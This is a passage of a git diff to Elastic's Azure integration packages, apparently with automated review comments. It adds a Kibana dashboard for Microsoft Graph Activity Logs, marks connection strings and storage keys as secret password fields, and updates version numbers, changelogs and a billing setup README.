+ "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "3027aa07-12ed-48a1-a760-745ed4a9ea26", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "500", + "lt": "599" + }, + "type": "range", + "value": { + "gte": "500", + "lt": "599" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "500", + "lt": "599" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#E7664C", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "8edfaa9c-8f05-4059-862f-a105de3304d6", + "w": 8, + "x": 40, + "y": 6 + }, + "panelIndex": "8edfaa9c-8f05-4059-862f-a105de3304d6", + "title": "Total HTTP Requests (copy 5)", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + 
"sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cloud Region", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "cloud.region" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "1d970b9f-148c-40e7-9723-76ae8d6de9ef", + "w": 17, + "x": 0, + "y": 12 + }, + "panelIndex": "1d970b9f-148c-40e7-9723-76ae8d6de9ef", + "title": "% of Graph Activity by Cloud Region", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + 
"customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cloud Region", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "cloud.region" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "bb6d8913-2437-461c-a5cb-95f745f2e061" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "23c1cc59-ff4c-48ef-bfc7-ee8a705a45f3", + "w": 31, + "x": 17, + "y": 12 + }, + "panelIndex": "23c1cc59-ff4c-48ef-bfc7-ee8a705a45f3", + "title": "Graph Activity by Cloud Region", + "type": "lens" + 
}, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User ID", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user.id" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": 
"ecb78f06-c2e8-4da8-9c05-091ae47cabab", + "w": 17, + "x": 0, + "y": 24 + }, + "panelIndex": "ecb78f06-c2e8-4da8-9c05-091ae47cabab", + "title": "% of Graph Activity by User", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "df2b5869-05ef-48e4-8113-b369950b832e", + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "df2b5869-05ef-48e4-8113-b369950b832e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of user.id", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + 
"axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "seriesType": "line", + "splitAccessor": "df2b5869-05ef-48e4-8113-b369950b832e", + "xAccessor": "bb6d8913-2437-461c-a5cb-95f745f2e061" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "6fce6c97-be76-41b5-b4eb-2e67b2dd060b", + "w": 31, + "x": 17, + "y": 24 + }, + "panelIndex": "6fce6c97-be76-41b5-b4eb-2e67b2dd060b", + "title": "Graph Activity by User Timeline", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User ID", + 
"operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "32635ea5-aef9-490a-9851-252f66a4180d", + "w": 17, + "x": 0, + "y": 36 + }, + "panelIndex": "32635ea5-aef9-490a-9851-252f66a4180d", + "title": "% of Graph Activity by HTTP Method", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": 
"ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "HTTP Method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "bb6d8913-2437-461c-a5cb-95f745f2e061" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "12619b1e-73a1-474b-89eb-8ee01df017de", + "w": 15, + "x": 17, + "y": 36 + }, + "panelIndex": "12619b1e-73a1-474b-89eb-8ee01df017de", + "title": "Graph Activity by HTTP Method", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "HTTP Method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "columns": [ + { + "columnId": "bb6d8913-2437-461c-a5cb-95f745f2e061" + }, + { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + } + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "3b43fe5b-e12b-408e-bc24-72dabfcfbc78", + "w": 16, + "x": 32, + "y": 36 + }, + "panelIndex": "3b43fe5b-e12b-408e-bc24-72dabfcfbc78", + "title": "Graph Activity by HTTP Method - Table", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs Azure] Microsoft Graph Activity Logs", + 
"version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-08T13:50:59.523Z", + "id": "azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0d7a9e98-05e4-48cc-b602-fbf6441fb5eb:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2d47eead-9f8b-4540-8e61-45290eda210a:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e0d5b2a4-14b1-4652-81f5-8989c48cb427:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e0d5b2a4-14b1-4652-81f5-8989c48cb427:f873ce81-d2b9-4d27-951b-ea42fe7b6629", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "faac9860-e512-4adf-a34a-0a89690fef99:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "faac9860-e512-4adf-a34a-0a89690fef99:64260958-62e3-45e9-accd-9a2f49bc86a2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f81b2567-5721-4dca-9ebf-243a69b06fe2:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f81b2567-5721-4dca-9ebf-243a69b06fe2:7cde628c-4f1d-44e1-8a34-169e4bb5e0b7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8edfaa9c-8f05-4059-862f-a105de3304d6:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8edfaa9c-8f05-4059-862f-a105de3304d6:3027aa07-12ed-48a1-a760-745ed4a9ea26", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"1d970b9f-148c-40e7-9723-76ae8d6de9ef:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "23c1cc59-ff4c-48ef-bfc7-ee8a705a45f3:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecb78f06-c2e8-4da8-9c05-091ae47cabab:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6fce6c97-be76-41b5-b4eb-2e67b2dd060b:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "32635ea5-aef9-490a-9851-252f66a4180d:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "12619b1e-73a1-474b-89eb-8ee01df017de:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3b43fe5b-e12b-408e-bc24-72dabfcfbc78:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d1ebc51c-cb49-49f6-840a-2da6d8a6be5b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d8d6db3e-83cb-40af-8f04-34f83ee80c6e:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_411c7a87-3506-4e60-949e-4d3694f18141:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_ba723455-7325-4205-95f4-6e52fa4e6e46:rangeSliderDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/azure/manifest.yml b/packages/azure/manifest.yml index 21257e4157c..057a513cc6a 100644 --- a/packages/azure/manifest.yml +++ b/packages/azure/manifest.yml 
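Review bot: The 5xx metric panel is titled `Total HTTP Requests (copy 5)` (panelIndex `8edfaa9c-…`), a leftover from duplicating the count tile, and the `% of Graph Activity by HTTP Method` donut (panelIndex `32635ea5-…`) buckets on `http.request.method` but labels the column `User ID`; those should read `HTTP Response 5xx` and `HTTP Method` respectively. The status-class tiles filter with `gte`/`lt` pairs such as `"gte": "100", "lt": "199"`, so codes 199, 299, 399, 499 and 599 land in no class tile even though the range slider control admits 100–599; use `"lt": "200"` (and 300/400/500/600) or `lte` on the upper bound. The 1xx tile's filter points at data view id `627dbdde-…`, which unlike the other class tiles has no matching entry in the panel or dashboard `references`, so it presumably resolves only through the KQL query; aligning it with the 2xx–5xx panels avoids a dangling reference. Since this is a Kibana export, make the fixes in the dashboard editor and re-export rather than hand-editing the JSON.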
@@ -1,6 +1,6 @@ name: azure title: Azure Logs -version: 1.8.3 +version: 1.11.0 description: This Elastic integration collects logs from Azure type: integration icons: @@ -8,13 +8,13 @@ icons: title: logo azure size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" categories: - azure - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -39,7 +39,8 @@ vars: show_user: true default: $Default - name: connection_string - type: text + type: password + secret: true title: Connection String multi: false required: true @@ -55,7 +56,8 @@ vars: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password + secret: true title: Storage Account Key multi: false required: true @@ -156,6 +158,28 @@ policy_templates: title: filebeat azure overview size: 5002x2666 type: image/png + - name: graphactivitylogs + title: Microsoft Graph Activity Logs + description: Microsoft Graph Activity Logs integration + data_streams: + - graphactivitylogs + categories: + - security + inputs: + - type: "azure-eventhub" + title: "Collect Microsoft Graph Activity Logs from Event Hub" + description: "Collecting graph activity logs from Azure instances (input: azure-eventhub)" + input_group: logs + icons: + - src: /img/graph_activity.png + title: logo graphactivity + size: 32x32 + type: image/svg+xml + screenshots: + - src: /img/graph_activity_logs.png + title: microsoft graph activity overview + size: 5002x2666 + type: image/png - name: springcloudlogs title: Azure Spring Apps logs description: Azure Spring Apps logs integration diff --git a/packages/azure_app_service/changelog.yml b/packages/azure_app_service/changelog.yml index 4fb494ac21e..2b76dedefc8 100644 --- a/packages/azure_app_service/changelog.yml +++ b/packages/azure_app_service/changelog.yml 
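Review bot: In the `@@ -156,6 +158,28 @@` hunk the new `graphactivitylogs` policy template's icon entry reads `src: /img/graph_activity.png` but `type: image/svg+xml`, so the declared MIME type contradicts the file extension; change it to `type: image/png`, or point `src` at the SVG if that is the real asset. The screenshot block repeats `size: 5002x2666` from the `filebeat azure overview` entry just above it, which looks copied — confirm it matches the actual dimensions of `graph_activity_logs.png`. The `policy_templates` list begins before this hunk.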
@@ -1,4 +1,19 @@ # newer versions go on top +- version: 0.3.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 0.2.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 0.2.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 0.1.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/azure_app_service/manifest.yml b/packages/azure_app_service/manifest.yml index b8d9735e0de..1f49215a2c1 100644 --- a/packages/azure_app_service/manifest.yml +++ b/packages/azure_app_service/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_app_service title: "Azure App Service" -version: "0.1.0" +version: "0.3.0" source: license: "Elastic-2.0" description: "Collect logs and metrics from Azure App Service with Elastic Agent." @@ -11,7 +11,7 @@ categories: - cloud conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" elastic: subscription: "basic" vars: @@ -31,8 +31,9 @@ vars: show_user: true default: $Default - name: connection_string - type: text + type: password title: Connection String + secret: true multi: false required: true show_user: true @@ -47,8 +48,9 @@ vars: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password title: Storage Account Key + secret: true multi: false required: true show_user: true 
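Review bot: The placement of the new `secret: true` key differs across the manifests in this diff: in the azure_app_service `@@ -31,8 +31,9 @@` and `@@ -47,8 +48,9 @@` hunks it follows `title`, in packages/azure/manifest.yml it directly follows `type: password`, and in the azure_blob_storage and azure_frontdoor manifests it is appended after `show_user: true`. Since every one of these entries is the same three-field pattern, keeping `type: password` and `secret: true` adjacent would make the sensitive variables easy to audit with a single grep; a one-line reorder per var is enough. The `vars` list starts outside each of these hunks.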
diff --git a/packages/azure_application_insights/changelog.yml b/packages/azure_application_insights/changelog.yml index a81ce6aec0d..f32b8405c59 100644 --- a/packages/azure_application_insights/changelog.yml +++ b/packages/azure_application_insights/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.4.0" + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.3.0" changes: - description: Enable time series data for metrics data streams. This dramatically reduces storage for metrics and is expected to progressively improve query [performance](https://www.elastic.co/blog/70-percent-storage-savings-for-metrics-with-elastic-observability). For more details, see https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds.html. diff --git a/packages/azure_application_insights/manifest.yml b/packages/azure_application_insights/manifest.yml index e1c1b8b0187..f30a03571e6 100644 --- a/packages/azure_application_insights/manifest.yml +++ b/packages/azure_application_insights/manifest.yml @@ -1,6 +1,6 @@ name: azure_application_insights title: Azure Application Insights Metrics Overview -version: 1.3.0 +version: 1.4.0 description: Collect application insights metrics from Azure Monitor with Elastic Agent. type: integration icons: @@ -13,7 +13,7 @@ screenshots: title: App State Overview size: 5120x2562 type: image/png -format_version: "3.0.0" +format_version: "3.0.2" categories: - azure - observability @@ -30,8 +30,9 @@ vars: required: true show_user: true - name: api_key - type: text + type: password title: Api Key + secret: true multi: false required: true show_user: true diff --git a/packages/azure_billing/_dev/build/docs/README.md b/packages/azure_billing/_dev/build/docs/README.md index 7311076a74f..462c443b324 100644 --- a/packages/azure_billing/_dev/build/docs/README.md +++ b/packages/azure_billing/_dev/build/docs/README.md 
@@ -19,7 +19,7 @@ Usage details metrics track actual expenses including details like subscription To use this integration you will need: -* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires the Billing Reader role to access the billing information for the subscription, department, or billing account. See more details in the [Setup section](#setup). +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires a role to access the billing information. The required role is different depending on the subscription, department, or billing account scope. Check the [Setup section](#setup) for more details. * **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. * **Payment method**: Azure Billing Metrics integration queries are charged based on the number of standard API calls. One integration makes two calls every 24 hours in the standard configuration. @@ -79,6 +79,10 @@ Take note of the content in the **Value** column in the **Client secrets** table #### Assign role +Assign a role to the App Registration depending on the scope you're interested in. + +To collect billing metrics from a single subscription, assign the **Billing Reader** to the App Registration on that subscription: + 1. In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. 1. Select the subscription to assign the application. 1. Select **Access control 